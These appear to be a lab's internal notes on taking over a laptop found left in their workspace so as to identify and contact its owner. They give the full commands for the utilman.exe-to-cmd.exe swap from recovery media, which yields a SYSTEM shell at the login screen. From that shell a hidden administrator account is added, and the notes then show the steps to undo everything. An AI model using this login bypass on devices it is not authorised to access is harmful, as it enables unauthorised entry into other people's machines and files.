# Notes for Determining Owner of Machine

## Operating Personnel

[REDACTED] Lab Technician

JC Boysha, Technical Instructor

## Steps taken

Prepare USB drive using established Windows 10 machine for Windows 10 Recovery. 

Boot Surface from prepared recovery USB. 

Do not allow USB to run clean install.

Press Shift+Fn+F10 to open Command Prompt. 

Run the following commands:

	move c:\windows\system32\utilman.exe c:\windows\system32\utilman.exe.bak

	copy c:\windows\system32\cmd.exe c:\windows\system32\utilman.exe
	
	wpeutil reboot

Upon reboot of machine, select the utility manager icon from the bottom right of the screen. 

This will now open a command prompt running as the SYSTEM user. 

Run the following commands:

	net user test /add

	net localgroup administrators test /add
	
	exit

Reboot device.

Upon reboot of machine, login as new "test" user by selecting "test" at the bottom left of the screen. 

This opens a session as the "test" user. 

[REDACTED ACCESS OF FILES TO DETERMINE OWNER OF MACHINE]

Contacted owner of machine and arranged for pickup.

Boot back into recovery USB. 

Run the following commands: 
	
	net user test /delete
	
	move c:\windows\system32\utilman.exe.bak c:\windows\system32\utilman.exe
	
	wpeutil shutdown

## Summary
A machine was left at our workspace with unknown reason. Upon finding the machine we decided to determine the owner to return the machine. In this case, we administratively took control of the machine by arranging for a known application available from the login screen (In this case utilman.exe) to open the command prompt instead (while preserving the original application for restoration). After the goal of determining the identity of the owner and arranging for pickup, we reversed all of our actions. The owner of the machine DID come pick up the device. Happy endings all around.
